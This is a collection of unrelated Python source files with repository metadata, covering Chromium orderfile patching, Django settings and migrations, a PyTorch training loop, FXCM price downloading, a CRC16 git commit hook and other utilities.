def _SymbolsWithSameOffset(profiled_symbol, name_to_symbol_info,
offset_to_symbol_info):
"""Expand a profiled symbol to include all symbols which share an offset
with that symbol.
Args:
profiled_symbol: the string symbol name to be expanded.
name_to_symbol_info: {name: [symbol_info1], ...}, as returned by
GetSymbolInfosFromBinary
offset_to_symbol_info: {offset: [symbol_info1, ...], ...}
Returns:
A list of symbol names, or an empty list if profiled_symbol was not in
name_to_symbol_info.
"""
if not profiled_symbol in name_to_symbol_info:
return []
symbol_infos = name_to_symbol_info[profiled_symbol]
expanded = []
for symbol_info in symbol_infos:
expanded += (s.name for s in offset_to_symbol_info[symbol_info.offset])
return expanded
def _ExpandSymbols(profiled_symbols, name_to_symbol_infos,
offset_to_symbol_infos):
"""Expand all of the symbols in profiled_symbols to include any symbols which
share the same address.
Args:
profiled_symbols: Symbols to match
name_to_symbol_infos: {name: [symbol_info1], ...}, as returned by
GetSymbolInfosFromBinary
offset_to_symbol_infos: {offset: [symbol_info1, ...], ...}
Returns:
A list of the symbol names.
"""
found_symbols = 0
missing_symbols = []
all_symbols = []
for name in profiled_symbols:
expansion = _SymbolsWithSameOffset(name,
name_to_symbol_infos, offset_to_symbol_infos)
if expansion:
found_symbols += 1
all_symbols += expansion
else:
all_symbols.append(name)
missing_symbols.append(name)
logging.info('symbols found: %d\n' % found_symbols)
if missing_symbols > 0:
logging.warning('%d missing symbols.' % len(missing_symbols))
missing_symbols_to_show = min(100, len(missing_symbols))
logging.warning('First %d missing symbols:\n%s' % (
missing_symbols_to_show,
'\n'.join(missing_symbols[:missing_symbols_to_show])))
return all_symbols
def _PrintSymbolsWithPrefixes(symbol_names, output_file):
"""For each symbol, outputs it to output_file with the prefixes."""
unique_outputs = set()
for name in symbol_names:
for prefix in _PREFIXES:
linker_section = prefix + name
if not linker_section in unique_outputs:
output_file.write(linker_section + '\n')
unique_outputs.add(linker_section)
def main(argv):
parser = optparse.OptionParser(usage=
'usage: %prog [options] <unpatched_orderfile> <library>')
parser.add_option('--target-arch', action='store', dest='arch',
choices=['arm', 'arm64', 'x86', 'x86_64', 'x64', 'mips'],
help='The target architecture for the library.')
options, argv = parser.parse_args(argv)
if not options.arch:
options.arch = cygprofile_utils.DetectArchitecture()
if len(argv) != 3:
parser.print_help()
return 1
orderfile_filename = argv[1]
binary_filename = argv[2]
symbol_extractor.SetArchitecture(options.arch)
(offset_to_symbol_infos, name_to_symbol_infos) = _GroupSymbolInfosFromBinary(
binary_filename)
profiled_symbols = GetSymbolsFromOrderfile(orderfile_filename)
expanded_symbols = _ExpandSymbols(
profiled_symbols, name_to_symbol_infos, offset_to_symbol_infos)
_PrintSymbolsWithPrefixes(expanded_symbols, sys.stdout)
# The following is needed otherwise Gold only applies a partial sort.
print '.text' # gets methods not in a section, such as assembly
print '.text.*' # gets everything else
return 0
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
sys.exit(main(sys.argv))
| 32.936975 | 80 | 0.710677 | [
"BSD-3-Clause"
] | yury-s/v8-inspector | Source/chrome/tools/cygprofile/patch_orderfile.py | 7,839 | Python |
# Generated by Django 2.0.2 on 2018-09-06 13:49
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('institution', '0016_institution_funding_document_email'),
]
operations = [
migrations.AddField(
model_name='institution',
name='funding_document_receiver',
field=models.CharField(max_length=100, null=True),
),
migrations.AddField(
model_name='institution',
name='funding_document_template',
field=models.CharField(max_length=100, null=True),
),
]
| 26.125 | 67 | 0.623604 | [
"MIT"
] | M4rkD/cogs3 | institution/migrations/0017_auto_20180906_1349.py | 627 | Python |
# -*- coding: utf-8 -*-
"""
This file contains all the settings used in production.
This file is required and if development.py is present these
values are overridden.
"""
from server.settings.components import config
# Production flags:
# https://docs.djangoproject.com/en/2.2/howto/deployment/
DEBUG = False
ALLOWED_HOSTS = [
# TODO: check production hosts
config('DOMAIN_NAME'),
# We need this value for `healthcheck` to work:
'localhost',
]
# Staticfiles
# https://docs.djangoproject.com/en/2.2/ref/contrib/staticfiles/
# This is a hack to allow a special flag to be used with `--dry-run`
# to test things locally.
_COLLECTSTATIC_DRYRUN = config(
'DJANGO_COLLECTSTATIC_DRYRUN', cast=bool, default=False,
)
# Adding STATIC_ROOT to collect static files via 'collectstatic':
STATIC_ROOT = '.static' if _COLLECTSTATIC_DRYRUN else '/var/www/django/static'
STATICFILES_STORAGE = (
# This is a string, not a tuple,
# but it does not fit into 80 characters rule.
'django.contrib.staticfiles.storage.ManifestStaticFilesStorage'
)
# Media files
# https://docs.djangoproject.com/en/2.2/topics/files/
MEDIA_ROOT = '/var/www/django/media'
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
_PASS = 'django.contrib.auth.password_validation' # noqa: S105
AUTH_PASSWORD_VALIDATORS = [
{'NAME': '{0}.UserAttributeSimilarityValidator'.format(_PASS)},
{'NAME': '{0}.MinimumLengthValidator'.format(_PASS)},
{'NAME': '{0}.CommonPasswordValidator'.format(_PASS)},
{'NAME': '{0}.NumericPasswordValidator'.format(_PASS)},
]
# Security
# https://docs.djangoproject.com/en/2.2/topics/security/
SECURE_HSTS_SECONDS = 31536000 # the same as Caddy has
SECURE_HSTS_INCLUDE_SUBDOMAINS = True
SECURE_HSTS_PRELOAD = True
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
SECURE_SSL_REDIRECT = True
SECURE_REDIRECT_EXEMPT = [
# This is required for healthcheck to work:
'^health/',
]
SESSION_COOKIE_SECURE = True
CSRF_COOKIE_SECURE = True
| 26.294872 | 78 | 0.736714 | [
"MIT"
] | alisher-matkurbanov/wemake-django-template | {{cookiecutter.project_name}}/server/settings/environments/production.py | 2,051 | Python |
# ============================================
__author__ = "Sachin Mehta and Ximing Lu"
__maintainer__ = "Sachin Mehta and Ximing Lu"
# ============================================
import torch
from utilities.print_utilities import *
import os
from utilities.lr_scheduler import get_lr_scheduler
from metrics.metric_utils import accuracy
from metrics.statistics import Statistics
import gc
from utilities.utils import save_checkpoint, load_checkpoint, save_arguments
from utilities.build_dataloader import get_data_loader
from utilities.build_model import build_model
from utilities.build_optimizer import build_optimizer, update_optimizer, read_lr_from_optimzier
from utilities.build_criteria import build_criteria
import numpy as np
import math
import json
from utilities.save_dict_to_file import DictWriter
from train_and_eval.train_utils import prediction
class Trainer(object):
'''This class implemetns the training and validation functionality for training ML model for medical imaging'''
def __init__(self, opts):
super(Trainer, self).__init__()
self.opts = opts
self.best_acc = 0
self.start_epoch = 0
# maximum batch size for CNN on single GPU
self.max_bsz_cnn_gpu0 = opts.max_bsz_cnn_gpu0
self.resume = self.opts.checkpoint if self.opts.checkpoint is not None and os.path.isdir(
self.opts.checkpoint) else None
self.global_setter()
def global_setter(self):
self.setup_device()
self.setup_directories()
self.setup_logger()
self.setup_lr_scheduler()
self.setup_dataloader()
self.setup_model_optimizer_lossfn()
def setup_directories(self):
if not os.path.isdir(self.opts.savedir):
os.makedirs(self.opts.savedir)
def setup_device(self):
num_gpus = torch.cuda.device_count()
self.num_gpus = num_gpus
if num_gpus > 0:
print_log_message('Using {} GPUs'.format(num_gpus))
else:
print_log_message('Using CPU')
self.device = torch.device("cuda:0" if num_gpus > 0 else "cpu")
self.use_multi_gpu = True if num_gpus > 1 else False
if torch.backends.cudnn.is_available():
import torch.backends.cudnn as cudnn
cudnn.benchmark = True
cudnn.deterministic = True
def setup_logger(self):
# Let's visualize logs on tensorboard. It's awesome
try:
from torch.utils.tensorboard import SummaryWriter
except:
from utilities.summary_writer import SummaryWriter
self.logger = SummaryWriter(log_dir=self.opts.savedir, comment='Training and Validation logs')
def setup_lr_scheduler(self):
# fetch learning rate scheduler
self.lr_scheduler = get_lr_scheduler(self.opts)
def setup_dataloader(self):
from model.base_feature_extractor import BaseFeatureExtractor
base_feature_extractor = BaseFeatureExtractor(opts=self.opts)
base_feature_extractor = base_feature_extractor.to(device=self.device)
# We do not want the base extractor to train, so setting it to eval mode
if self.use_multi_gpu:
base_feature_extractor = torch.nn.DataParallel(base_feature_extractor)
self.base_feature_extractor = base_feature_extractor
self.base_feature_extractor.eval()
# sanity check
if self.base_feature_extractor.training:
print_warning_message('Base feature extractor is in training mode. Moving to evaluation mode')
self.base_feature_extractor.eval()
train_loader, val_loader, diag_classes, class_weights = get_data_loader(opts=self.opts)
self.train_loader = train_loader
self.val_loader = val_loader
self.diag_classes = diag_classes
self.class_weights = torch.from_numpy(class_weights)
def setup_model_optimizer_lossfn(self):
# Build Model
odim = self.base_feature_extractor.module.output_feature_sz if self.use_multi_gpu else self.base_feature_extractor.output_feature_sz
mi_model = build_model(opts=self.opts,
diag_classes=self.diag_classes,
base_feature_odim=odim
)
if self.resume is not None:
resume_ep, resume_model_state, resume_optim_state, resume_perf = load_checkpoint(
checkpoint_dir=self.opts.checkpoint,
device=self.device)
self.start_epoch = resume_ep
self.best_acc = resume_perf
self.mi_model.load_state_dict(resume_model_state)
self.optimizer.load_state_dict(resume_optim_state)
# move optimizer state to the device
for state in self.optimizer.state.values():
for k, v in state.items():
if isinstance(v, torch.Tensor):
state[k] = v.to(device=self.device)
print_log_message('Resuming from checkpoint saved at {}th epoch'.format(self.start_epoch))
mi_model = mi_model.to(device=self.device)
if self.use_multi_gpu:
mi_model = torch.nn.DataParallel(mi_model)
self.mi_model = mi_model
# Build Loss function
criteria = build_criteria(opts=self.opts, class_weights=self.class_weights.float())
self.criteria = criteria.to(device=self.device)
# Build optimizer
self.optimizer = build_optimizer(model=self.mi_model, opts=self.opts)
def training(self, epoch, lr, *args, **kwargs):
train_stats = Statistics()
self.mi_model.train()
self.optimizer.zero_grad()
num_samples = len(self.train_loader)
epoch_start_time = time.time()
for batch_id, batch in enumerate(self.train_loader):
words, true_diag_labels = batch
true_diag_labels = true_diag_labels.to(device=self.device)
# prediction
pred_diag_labels = prediction(
words=words,
cnn_model=self.base_feature_extractor,
mi_model=self.mi_model,
max_bsz_cnn_gpu0=self.max_bsz_cnn_gpu0,
num_gpus=self.num_gpus,
device=self.device
)
# compute loss
loss = self.criteria(pred_diag_labels, true_diag_labels)
# compute metrics
top1_acc = accuracy(pred_diag_labels, true_diag_labels, topk=(1,))
loss.backward()
# Gradient accumulation is useful, when batch size is very small say 1
# Gradients will be accumulated for accum_count iterations
# After accum_count iterations, weights are updated and graph is freed.
if (batch_id + 1) % self.opts.accum_count == 0 or batch_id + 1 == len(self.train_loader):
self.optimizer.step()
self.optimizer.zero_grad()
train_stats.update(loss=loss.item(), acc=top1_acc[0].item())
if batch_id % self.opts.log_interval == 0 and batch_id > 0: # print after every 100 batches
train_stats.output(epoch=epoch, batch=batch_id, n_batches=num_samples, start=epoch_start_time, lr=lr)
return train_stats.avg_acc(), train_stats.avg_loss()
def warm_up(self, *args, **kwargs):
self.mi_model.train()
num_samples = len(self.train_loader)
warm_up_iterations = int(math.ceil((self.opts.warm_up_iterations * 1.0) / num_samples) * num_samples)
print_info_message('Warming Up')
print_log_message(
'LR will linearly change from {} to {} in about {} steps'.format(self.opts.warm_up_min_lr, self.opts.lr,
warm_up_iterations))
lr_list = np.linspace(1e-7, self.opts.lr, warm_up_iterations)
epoch_start_time = time.time()
iteration = -1
while iteration < warm_up_iterations:
warm_up_stats = Statistics()
for batch_id, batch in enumerate(self.train_loader):
if iteration >= warm_up_iterations:
break
iteration += 1
try:
lr_iter = lr_list[iteration]
except:
# fall back to final LR after warm-up step if iteration is outsize lr_list range
lr_iter = self.opts.lr
# update learning rate at every iteration
self.optimizer = update_optimizer(optimizer=self.optimizer, lr_value=lr_iter)
words, true_diag_labels = batch
true_diag_labels = true_diag_labels.to(device=self.device)
# prediction
pred_diag_labels = prediction(
words=words,
cnn_model=self.base_feature_extractor,
mi_model=self.mi_model,
max_bsz_cnn_gpu0=self.max_bsz_cnn_gpu0,
num_gpus=self.num_gpus,
device=self.device
)
# compute loss
loss = self.criteria(pred_diag_labels, true_diag_labels)
# compute metrics
top1_acc = accuracy(pred_diag_labels, true_diag_labels, topk=(1,))
loss.backward()
# Gradient accumulation is useful, when batch size is very small say 1
# Gradients will be accumulated for accum_count iterations
# After accum_count iterations, weights are updated and graph is freed.
if (batch_id + 1) % self.opts.accum_count == 0 or batch_id + 1 == len(self.train_loader):
self.optimizer.step()
self.optimizer.zero_grad()
warm_up_stats.update(loss=loss.item(), acc=top1_acc[0].item())
if batch_id % self.opts.log_interval == 0 and batch_id > 0: # print after every 100 batches
warm_up_stats.output(epoch=-1, batch=iteration, n_batches=warm_up_iterations,
start=epoch_start_time,
lr=lr_iter)
gc.collect()
print_log_message('Warming Up... Done!!!')
def validation(self, epoch, lr, *args, **kwargs):
val_stats = Statistics()
self.mi_model.eval()
num_samples = len(self.val_loader)
with torch.no_grad():
epoch_start_time = time.time()
for batch_id, batch in enumerate(self.val_loader):
# bags, bag_hist_arr, words, word_hist_arr, true_diag_labels = batch
words, true_diag_labels = batch
true_diag_labels = true_diag_labels.to(device=self.device)
# prediction
pred_diag_labels = prediction(
words=words,
cnn_model=self.base_feature_extractor,
mi_model=self.mi_model,
max_bsz_cnn_gpu0=self.max_bsz_cnn_gpu0,
num_gpus=self.num_gpus,
device=self.device
)
# compute loss
loss = self.criteria(pred_diag_labels, true_diag_labels)
# compute metrics
top1_acc = accuracy(pred_diag_labels, true_diag_labels, topk=(1,))
val_stats.update(loss=loss.item(), acc=top1_acc[0].item())
if batch_id % self.opts.log_interval == 0 and batch_id > 0: # print after every 100 batches
val_stats.output(epoch=epoch, batch=batch_id, n_batches=num_samples, start=epoch_start_time, lr=lr)
gc.collect()
avg_acc = val_stats.avg_acc()
avg_loss = val_stats.avg_loss()
print_log_message('* Validation Stats')
print_log_message('* Loss: {:5.2f}, Mean Acc: {:3.2f}'.format(avg_loss, avg_acc))
return avg_acc, avg_loss
def run(self, *args, **kwargs):
kwargs['need_attn'] = False
if self.opts.warm_up:
self.warm_up(args=args, kwargs=kwargs)
if self.resume is not None:
# find the LR value
for epoch in range(self.start_epoch):
self.lr_scheduler.step(epoch)
eval_stats_dict = dict()
for epoch in range(self.start_epoch, self.opts.epochs):
epoch_lr = self.lr_scheduler.step(epoch)
self.optimizer = update_optimizer(optimizer=self.optimizer, lr_value=epoch_lr)
# Uncomment this line if you want to check the optimizer's LR is updated correctly
# assert read_lr_from_optimzier(self.optimizer) == epoch_lr
train_acc, train_loss = self.training(epoch=epoch, lr=epoch_lr, args=args, kwargs=kwargs)
val_acc, val_loss = self.validation(epoch=epoch, lr=epoch_lr, args=args, kwargs=kwargs)
eval_stats_dict[epoch] = val_acc
gc.collect()
# remember best accuracy and save checkpoint for best model
is_best = val_acc >= self.best_acc
self.best_acc = max(val_acc, self.best_acc)
model_state = self.mi_model.module.state_dict() if isinstance(self.mi_model, torch.nn.DataParallel) \
else self.mi_model.state_dict()
optimizer_state = self.optimizer.state_dict()
save_checkpoint(epoch=epoch,
model_state=model_state,
optimizer_state=optimizer_state,
best_perf=self.best_acc,
save_dir=self.opts.savedir,
is_best=is_best,
keep_best_k_models=self.opts.keep_best_k_models
)
self.logger.add_scalar('LR', round(epoch_lr, 6), epoch)
self.logger.add_scalar('TrainingLoss', train_loss, epoch)
self.logger.add_scalar('TrainingAcc', train_acc, epoch)
self.logger.add_scalar('ValidationLoss', val_loss, epoch)
self.logger.add_scalar('ValidationAcc', val_acc, epoch)
# dump the validation epoch id and accuracy data, so that it could be used for filtering later on
eval_stats_dict_sort = {k: v for k, v in sorted(eval_stats_dict.items(),
key=lambda item: item[1],
reverse=True
)}
eval_stats_fname = '{}/val_stats_bag_{}_word_{}_{}_{}'.format(
self.opts.savedir,
self.opts.bag_size,
self.opts.word_size,
self.opts.attn_fn,
self.opts.attn_type,
)
writer = DictWriter(file_name=eval_stats_fname, format='json')
# if json file does not exist
if not os.path.isfile(eval_stats_fname):
writer.write(data_dict=eval_stats_dict_sort)
else:
with open(eval_stats_fname, 'r') as json_file:
eval_stats_dict_old = json.load(json_file)
eval_stats_dict_old.update(eval_stats_dict_sort)
eval_stats_dict_updated = {k: v for k, v in sorted(eval_stats_dict_old.items(),
key=lambda item: item[1],
reverse=True
)}
writer.write(data_dict=eval_stats_dict_updated)
self.logger.close()
| 41.248677 | 140 | 0.602745 | [
"MIT"
] | alibalapour/HATNet | train_and_eval/trainer.py | 15,592 | Python |
class Error(Exception):
'''Base Error.'''
def __init__(self):
self.error = 'Fatal error occured.'
super().__init__(self.error)
class ArgError(Error):
'''Argument Error.'''
def __init__(self):
self.error = 'Incorrect argument passed.'
super().__init__(self.error)
class MissingArg(ArgError):
'''Argument is missing.'''
def __init__(self, arg):
self.error = f'{arg} is a required argument that is missing.'
super().__init__(self.error)
class InvalidArg(ArgError):
'''Argument is invalid.'''
def __init__(self, arg):
self.error = f'{arg} is invalid.'
super().__init__(self.error)
class HTTPError(Error):
'''Error occured in HTTP.'''
def __init__(self, code):
self.error = f'An error occured. Status: {code}'
super().__init__(self.error)
class Timeout(HTTPError):
'''Connection timed out.'''
def __init__(self):
self.error = 'The connection timed out.'
super().__init__(self.error)
class MissingData(Error):
'''Missing data.'''
def __init__(self, data):
self.error = f'Value of {data} is missing.' | 22.255319 | 63 | 0.685468 | [
"MIT"
] | cree-py/cocasync | cocasync/errors.py | 1,046 | Python |
from django.apps import AppConfig
class RuntimeMainConfig(AppConfig):
name = 'runtime_main'
| 16.333333 | 35 | 0.77551 | [
"Apache-2.0"
] | Bodya00/RunTime | runtime/runtime_main/apps.py | 98 | Python |
from sympy import symbols, integrate, Rational, lambdify
import matplotlib.pyplot as plt
import numpy as np
# Pollution from a factory is entering a lake. The rate of concentration of the pollutant at time t is given by
t = symbols( 't', positive = True )
dP = 91*t ** Rational( 5, 2 )
# where t is the number of years since the factory started introducing pollutants into the lake.
# Ecologists estimate that the lake can accept a total level of pollution of 7600 units before all the fish life in the lake ends.
# Can the factory operate for 5 years without killing all the fish in the lake?
# Yes, because:
P = integrate( dP, ( t, 0, 5 ) ).evalf()
round( P )
# is less than 7600.
# What is the polution doing?
g_xlim = [ 1, 10 ]
g_ylim = [ -5, 15 ]
lam_p = lambdify( t, integrate( dP, t ), np )
x_vals = np.linspace( g_xlim[0], g_xlim[1], 1000, endpoint=True )
y_vals = lam_p( x_vals )
plt.plot( x_vals, y_vals )
plt.show() | 33.464286 | 132 | 0.708645 | [
"MIT"
] | bmoretz/Python-Playground | src/Classes/MSDS400/Module 7/polution.py | 939 | Python |
import numpy as np
import pandas as pd
from collections import OrderedDict
def one_to_one_matching(pred_infos, gt_infos,
keys=('scene_id', 'view_id'),
allow_pred_missing=False):
keys = list(keys)
pred_infos['pred_id'] = np.arange(len(pred_infos))
gt_infos['gt_id'] = np.arange(len(gt_infos))
matches = pred_infos.merge(gt_infos, on=keys)
matches_gb = matches.groupby(keys).groups
assert all([len(v) == 1 for v in matches_gb.values()])
if not allow_pred_missing:
assert len(matches) == len(gt_infos)
return matches
def get_candidate_matches(pred_infos, gt_infos,
group_keys=['scene_id', 'view_id', 'label'],
only_valids=True):
pred_infos['pred_id'] = np.arange(len(pred_infos))
gt_infos['gt_id'] = np.arange(len(gt_infos))
group_keys = list(group_keys)
cand_infos = pred_infos.merge(gt_infos, on=group_keys)
if only_valids:
cand_infos = cand_infos[cand_infos['valid']].reset_index(drop=True)
cand_infos['cand_id'] = np.arange(len(cand_infos))
return cand_infos
def match_poses(cand_infos, group_keys=['scene_id', 'view_id', 'label']):
assert 'error' in cand_infos
matches = []
def match_label_preds(group):
gt_ids_matched = set()
group = group.reset_index(drop=True)
gb_pred = group.groupby('pred_id', sort=False)
ids_sorted = gb_pred.first().sort_values('score', ascending=False)
gb_pred_groups = gb_pred.groups
for idx, _ in ids_sorted.iterrows():
pred_group = group.iloc[gb_pred_groups[idx]]
best_error = np.inf
best_match = None
for _, tentative_match in pred_group.iterrows():
if tentative_match['error'] < best_error and \
tentative_match['gt_id'] not in gt_ids_matched:
best_match = tentative_match
best_error = tentative_match['error']
if best_match is not None:
gt_ids_matched.add(best_match['gt_id'])
matches.append(best_match)
if len(cand_infos) > 0:
cand_infos.groupby(group_keys).apply(match_label_preds)
matches = pd.DataFrame(matches).reset_index(drop=True)
else:
matches = cand_infos
return matches
| 36.369231 | 75 | 0.630711 | [
"MIT"
] | lesteve/robopose | robopose/evaluation/meters/utils.py | 2,364 | Python |
# -- --------------------------------------------------------------------------------------------------- -- #
# -- project: A python project for algorithmic trading in FXCM -- #
# -- --------------------------------------------------------------------------------------------------- -- #
# -- script: requirements.txt : text file with the required libraries for the project -- #
# -- author: YOUR GITHUB USER NAME -- #
# -- license: MIT License -- #
# -- --------------------------------------------------------------------------------------------------- -- #
# -- Template repository: https://github.com/IFFranciscoME/trading-project -- #
# -- --------------------------------------------------------------------------------------------------- -- #
# -- Packages for the script
import fxcmpy
import pandas as pd
# -- --------------------------------------------------------------------------------------------------- -- #
# -- --------------------------------------------------------------------------------------------------- -- #
api_token = "ba432..." # This token is obtained in the fxcm trading station platform
con = fxcmpy.fxcmpy(access_token=api_token, server='demo', log_level='error', log_file='fxcm_logs.txt')
# -- --------------------------------------------------------------------------------------------------- -- #
# -- --------------------------------------------------------------------------------------------------- -- #
def fxcm_ohlc(p_instrument, p_period, p_ini, p_end):
"""
to download OHLC prices from FXCM broker
Parameters
----------
p_instrument: str
The name of the instrument according to fxcmpy
p_freq: str
The frequency or granularity of prices, according to fxcmpy
p_ini: str
Initial timestamp, in format "yyyy-mm-dd hh:mm:ss"
p_end: str
final timestamp, in format "yyyy-mm-dd hh:mm:ss"
Returns
-------
data_ohlc: DataFrame
with columns Open, High, Low, Close and Timestamp as index
"""
data_ohlc = con.get_candles(instrument=p_instrument, period=p_period,
start=p_ini, end=p_end)
data_ohlc['open'] = (data_ohlc['bidopen'] + data_ohlc['askopen'])*0.5
data_ohlc['high'] = (data_ohlc['bidhigh'] + data_ohlc['askhigh'])*0.5
data_ohlc['low'] = (data_ohlc['bidlow'] + data_ohlc['asklow'])*0.5
data_ohlc['close'] = (data_ohlc['bidclose'] + data_ohlc['askclose'])*0.5
data_ohlc = data_ohlc[['open', 'high', 'low', 'close']]
data_ohlc.index.name = 'timestamp'
return data_ohlc
| 44.698413 | 109 | 0.393111 | [
"MIT"
] | IFFranciscoME/trading-project | data.py | 2,816 | Python |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2020/1/28 14:07
# @Author : ywl
# @Email : [email protected]
# @File : commit-msg.py.py
import os
import sys
import re
import json
crc_list = (
0x0000, 0x1021, 0x2042, 0x3063, 0x4084, 0x50a5, 0x60c6, 0x70e7,
0x8108, 0x9129, 0xa14a, 0xb16b, 0xc18c, 0xd1ad, 0xe1ce, 0xf1ef,
0x1231, 0x0210, 0x3273, 0x2252, 0x52b5, 0x4294, 0x72f7, 0x62d6,
0x9339, 0x8318, 0xb37b, 0xa35a, 0xd3bd, 0xc39c, 0xf3ff, 0xe3de,
0x2462, 0x3443, 0x0420, 0x1401, 0x64e6, 0x74c7, 0x44a4, 0x5485,
0xa56a, 0xb54b, 0x8528, 0x9509, 0xe5ee, 0xf5cf, 0xc5ac, 0xd58d,
0x3653, 0x2672, 0x1611, 0x0630, 0x76d7, 0x66f6, 0x5695, 0x46b4,
0xb75b, 0xa77a, 0x9719, 0x8738, 0xf7df, 0xe7fe, 0xd79d, 0xc7bc,
0x48c4, 0x58e5, 0x6886, 0x78a7, 0x0840, 0x1861, 0x2802, 0x3823,
0xc9cc, 0xd9ed, 0xe98e, 0xf9af, 0x8948, 0x9969, 0xa90a, 0xb92b,
0x5af5, 0x4ad4, 0x7ab7, 0x6a96, 0x1a71, 0x0a50, 0x3a33, 0x2a12,
0xdbfd, 0xcbdc, 0xfbbf, 0xeb9e, 0x9b79, 0x8b58, 0xbb3b, 0xab1a,
0x6ca6, 0x7c87, 0x4ce4, 0x5cc5, 0x2c22, 0x3c03, 0x0c60, 0x1c41,
0xedae, 0xfd8f, 0xcdec, 0xddcd, 0xad2a, 0xbd0b, 0x8d68, 0x9d49,
0x7e97, 0x6eb6, 0x5ed5, 0x4ef4, 0x3e13, 0x2e32, 0x1e51, 0x0e70,
0xff9f, 0xefbe, 0xdfdd, 0xcffc, 0xbf1b, 0xaf3a, 0x9f59, 0x8f78,
0x9188, 0x81a9, 0xb1ca, 0xa1eb, 0xd10c, 0xc12d, 0xf14e, 0xe16f,
0x1080, 0x00a1, 0x30c2, 0x20e3, 0x5004, 0x4025, 0x7046, 0x6067,
0x83b9, 0x9398, 0xa3fb, 0xb3da, 0xc33d, 0xd31c, 0xe37f, 0xf35e,
0x02b1, 0x1290, 0x22f3, 0x32d2, 0x4235, 0x5214, 0x6277, 0x7256,
0xb5ea, 0xa5cb, 0x95a8, 0x8589, 0xf56e, 0xe54f, 0xd52c, 0xc50d,
0x34e2, 0x24c3, 0x14a0, 0x0481, 0x7466, 0x6447, 0x5424, 0x4405,
0xa7db, 0xb7fa, 0x8799, 0x97b8, 0xe75f, 0xf77e, 0xc71d, 0xd73c,
0x26d3, 0x36f2, 0x0691, 0x16b0, 0x6657, 0x7676, 0x4615, 0x5634,
0xd94c, 0xc96d, 0xf90e, 0xe92f, 0x99c8, 0x89e9, 0xb98a, 0xa9ab,
0x5844, 0x4865, 0x7806, 0x6827, 0x18c0, 0x08e1, 0x3882, 0x28a3,
0xcb7d, 0xdb5c, 0xeb3f, 0xfb1e, 0x8bf9, 0x9bd8, 0xabbb, 0xbb9a,
0x4a75, 0x5a54, 0x6a37, 0x7a16, 0x0af1, 0x1ad0, 0x2ab3, 0x3a92,
0xfd2e, 0xed0f, 0xdd6c, 0xcd4d, 0xbdaa, 0xad8b, 0x9de8, 0x8dc9,
0x7c26, 0x6c07, 0x5c64, 0x4c45, 0x3ca2, 0x2c83, 0x1ce0, 0x0cc1,
0xef1f, 0xff3e, 0xcf5d, 0xdf7c, 0xaf9b, 0xbfba, 0x8fd9, 0x9ff8,
0x6e17, 0x7e36, 0x4e55, 0x5e74, 0x2e93, 0x3eb2, 0x0ed1, 0x1ef0
)
def sum_crc16(crc, file_bit):
"""
计算CRC16
@param crc:初始校验码
@param file_bit:文件2进制流
@return:校验码
"""
for bit in file_bit:
crc = 0xffff & crc
# temp = crc // 256
temp = crc >> 8
crc = 0xffff & crc
crc <<= 8
crc = 0xffff & crc
crc ^= crc_list[0xff & (temp ^ bit)]
return crc
def sum_file_crc16(file_name):
"""
计算文件校验码,每次计算4096字节
@param file_name:文件名
@return:校验码
"""
crc = 0
with open(file_name, 'rb') as f:
crc = sum_crc16(crc, f.read())
return crc
def get_version():
with open("pack/release_version.json", "r+", encoding="utf8") as f:
try:
versions = json.load(f)
return 'v' + versions["release_versions"][-1][-1]
except Exception as e:
print("读取版本失败 : ", e)
exit(-1)
def get_srv_crc():
srv_name = "src/AIService"
if not os.path.exists(srv_name) or os.path.isdir(srv_name):
print("no srv build AIService")
exit(-1)
return sum_file_crc16(srv_name)
# crc = hex(sum_file_crc16(srv_name)).upper()[2:]
# crc = '0' * (4 - len(crc)) + crc
# return crc
def check_first_line(line):
return re.match(r'\[version : [vV](0|[1-9][0-9]*.?)\.(0|[1-9][0-9]*.?)\.(0|[1-9][0-9]*.?)\] '
r'\[srv-crc16 : [0-9A-F]{4}\]$', line)
def add_pre_msg():
commit_msg_file = sys.argv[1]
with open(commit_msg_file, "r+") as f:
text = list()
while True:
line = f.readline()
if not line:
break
text.append(line)
pre = "[version : %s] [srv-crc16 : %04X]\n" % (get_version(), get_srv_crc())
if check_first_line(text[0]):
text[0] = pre
else:
text.insert(0, pre)
f.seek(0)
f.truncate()
f.writelines(text)
if __name__ == "__main__":
add_pre_msg()
| 33.096296 | 98 | 0.597359 | [
"MIT"
] | wotsen/learning_platform_server | hooks/commit-msg.py | 4,550 | Python |
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import filecmp
import os
import json
import tempfile
import unittest
from india_rbi.below_poverty_line.preprocess import BelowPovertyLineDataLoader
# module_dir_ is the path to where this test is running from.
module_dir_ = os.path.dirname(__file__)
class TestPreprocess(unittest.TestCase):
def test_create_csv(self):
with tempfile.TemporaryDirectory() as tmp_dir:
xlsx_file = os.path.join(module_dir_, 'test_data/test.XLSX')
expected_file = os.path.join(module_dir_, 'test_data/expected.csv')
result_file = os.path.join(tmp_dir, 'test_cleaed.csv')
loader = BelowPovertyLineDataLoader(xlsx_file)
loader.download()
loader.process()
loader.save(csv_file_path=result_file)
same = filecmp.cmp(result_file, expected_file)
os.remove(result_file)
self.assertTrue(same)
if __name__ == '__main__':
unittest.main()
| 32.382979 | 79 | 0.720762 | [
"Apache-2.0"
] | clincoln8/data | scripts/india_rbi/below_poverty_line/preprocess_test.py | 1,522 | Python |
# coding: utf-8
###################################################################
# Copyright (c) 2016-2020 European Synchrotron Radiation Facility #
# #
# Author: Marius Retegan #
# #
# This work is licensed under the terms of the MIT license. #
# For further information, see https://github.com/mretegan/crispy #
###################################################################
"""Classes used to setup Quanty calculations."""
import datetime
import glob
import logging
import os
import re
import subprocess
from functools import lru_cache
from PyQt5.QtCore import QProcess, Qt, pyqtSignal
from crispy import resourceAbsolutePath
from crispy.config import Config
from crispy.gui.items import BaseItem, DoubleItem, IntItem, SelectableItem
from crispy.gui.quanty.axes import Axes
from crispy.gui.quanty.hamiltonian import Hamiltonian
from crispy.gui.quanty.spectra import Spectra
